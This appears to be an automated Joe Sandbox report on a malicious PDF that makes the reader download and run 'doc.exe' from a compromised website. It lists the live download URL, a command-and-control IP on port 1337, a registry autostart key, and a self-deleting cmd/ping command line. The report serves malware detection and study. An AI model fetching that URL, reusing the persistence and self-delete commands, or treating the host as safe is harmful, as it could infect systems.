Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:491829
Start time:21:31:26
Joe Sandbox Product:Cloud
Start date:03.02.2018
Overall analysis duration:0h 7m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:aaa.pdf
Cookbook file name:defaultwindowspdfcookbook.jbs
Analysis system description:Windows 10 (Java 1.8.0_91, Flash 21.0.0.242, Acrobat Reader DC 2015.016.20039, Internet Explorer 11, Chrome 51, Firefox 47)
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal88.evad.expl.spyw.troj.winPDF@22/41@5/4
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 24
  • Number of non-executed functions: 48
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .pdf
  • Found PDF document
  • Simulate clicks
  • Security Warning found
  • Click Allow
  • Close Viewer
  • URL browsing timeout
Warnings:
Show All
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe, rundll32.exe, WmiApSrv.exe
  • Execution Graph export aborted for target RdrCEF.exe, PID 3644 because it is empty
  • Execution Graph export aborted for target iexplore.exe, PID 876 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: doc.exe, doc.exe


Detection

StrategyScoreRangeReportingDetection
Threshold880 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: aaa.pdfvirustotal: Detection: 8%Perma Link

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: zwangerschapsyogaamsterdamwest.nl
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80
Browser exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wp-user/doc.exe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: zwangerschapsyogaamsterdamwest.nlConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: zwangerschapsyogaamsterdamwest.nl
Urls found in memory or binary dataShow sources
Source: iexplore.exeString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/IE/W8M6OQAW/doc
Source: AcroRd32.exeString found in binary or memory: http://
Source: AcroRd32.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: iexplore.exeString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: AcroRd32.exeString found in binary or memory: http://n
Source: iexplore.exeString found in binary or memory: http://ocsp.digicert.com
Source: AcroRd32.exeString found in binary or memory: http://ocsp.thawte.com0
Source: AcroRd32.exeString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: AcroRd32.exeString found in binary or memory: http://s.symcd.com0_
Source: AcroRd32.exeString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: AcroRd32.exeString found in binary or memory: http://sw.symcd.com0
Source: AcroRd32.exeString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: AcroRd32.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AcroRd32.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AcroRd32.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: AcroRd32.exeString found in binary or memory: http://www.adobe.c
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/drm/default
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/elementId%http://www.osmf.org/temporal/embedded$http://www.osmf.org/temporal/dyn
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/layout/anchor
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/region/target#http://www.osmf.org/layout/renderer#http://www.osmf.org/layout/abs
Source: AcroRd32.exeString found in binary or memory: http://www.osmf.org/subclip/1.0
Source: AcroRd32.exeString found in binary or memory: http://www.quicktime.com.Acrobat
Source: iexplore.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc
Source: iexplore.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe)
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe9
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe?
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeC:
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeT8
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeWesternY
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe_
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exedv
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeeDNS
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exei
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel(9
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exell9
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exet
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exex93$
Source: AcroRd32.exeString found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exey
Source: AcroRd32.exeString found in binary or memory: https://
Source: AcroRd32.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: AcroRd32.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: AcroRd32.exeString found in binary or memory: https://d.symcb.com/rpa0)
Source: AcroRd32.exeString found in binary or memory: https://ims-na1.adobelogin.com
Source: iexplore.exeString found in binary or memory: https://login.live.com
Source: iexplore.exeString found in binary or memory: https://login.live.com/
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.12.2Date: Sat, 03 Feb 2018 20:33:25 GMTContent-Type: application/x-msdownloadContent-Length: 345600Connection: keep-aliveLast-Modified: Thu, 01 Feb 2018 12:35:29 GMTAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 3a 72 5a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3e 05 00 00 06 00 00 00 00 00 00 be 5d 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 5d 05 00 4b
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.72:49756 -> 213.183.58.7:1337
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2022239 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80
Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant

Stealing of Sensitive Information:

barindex
Uploads sensitive system information to the internet (privacy leak)Show sources
Source: 192.168.1.72:49751 -> 192.185.103.35:80HTTP traffic detected: Header contains sensitive information user (username): GET /wp-user/doc.exe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: zwangerschapsyogaamsterdamwest.nlConnection: Keep-Alive

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\

System Summary:

barindex
Found GUI installer (many successful clicks)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeAutomated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exeAutomated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exeAutomated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exeAutomated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exeAutomated click: Run
Uses Rich Edit ControlsShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SYSTEM32\Msftedit.dll
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile opened: C:\Program Files\Java\jre1.8.0_91\bin\msvcr100.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: ProgID = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source: Binary string: VersionIndependentProgID = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: AcroExch.PDBookmark.1 = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: AcroExch.PDBookmark = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source: Binary string: CurVer = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source: Binary string: ForceRemove {2EAF0840-690A-101B-9CA8-9240CE2738AE} = s 'AcroExch.PDBookmark' source: AcroRd32.exe
PDF has a JavaScript or JS counter value indicative for goodwareShow sources
Source: aaa.pdfInitial sample: PDF keyword /JS count = 0
Source: aaa.pdfInitial sample: PDF keyword /JavaScript count = 0
PDF has an EmbeddedFile counter value indicative for goodwareShow sources
Source: aaa.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Classification labelShow sources
Source: classification engineClassification label: mal88.evad.expl.spyw.troj.winPDF@22/41@5/4
Clickable URLs found in PDFShow sources
Source: aaa.pdfInitial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Creates files inside the user directoryShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
Creates temporary filesShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9Rtpgc30_1jawsca_2cc.tmp
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Reads ini filesShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile read: C:\Program Files\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: aaa.pdfVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\aaa.pdf'
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Writes ini filesShow sources
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeFile written: C:\Windows\assembly\Desktop.ini
Creates files inside the system directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeFile created: C:\Windows\assembly\Desktop.ini
Creates mutexesShow sources
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeMutant created: \Sessions\1\BaseNamedObjects\27debcab-f106-478b-9b30-c709f1afc06a
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Detected potential crypto functionShow sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10EC625_2_3C10EC62
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10D3075_2_3C10D307
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C113DF25_2_3C113DF2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10C5275_2_3C10C527
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10DA275_2_3C10DA27
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10E1275_2_3C10E127
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C115F115_2_3C115F11
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C115BE75_2_3C115BE7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10D63B5_2_3C10D63B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10E44D5_2_3C10E44D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C119FB25_2_3C119FB2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C11B27D5_2_3C11B27D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C116B465_2_3C116B46
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C111EE65_2_3C111EE6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10B0475_2_3C10B047
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1130825_2_3C113082
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1192A75_2_3C1192A7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10E9E65_2_3C10E9E6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C11B98D5_2_3C11B98D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C119C865_2_3C119C86
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1121585_2_3C112158
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1195255_2_3C119525
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10B3795_2_3C10B379
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10AB8B5_2_3C10AB8B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C142C605_2_3C142C60
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10C84B5_2_3C10C84B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C113AC65_2_3C113AC6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1154C55_2_3C1154C5
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C116DC25_2_3C116DC2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1157FB5_2_3C1157FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1132FB5_2_3C1132FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C11B0075_2_3C11B007
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1105F25_2_3C1105F2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C10DD4B5_2_3C10DD4B
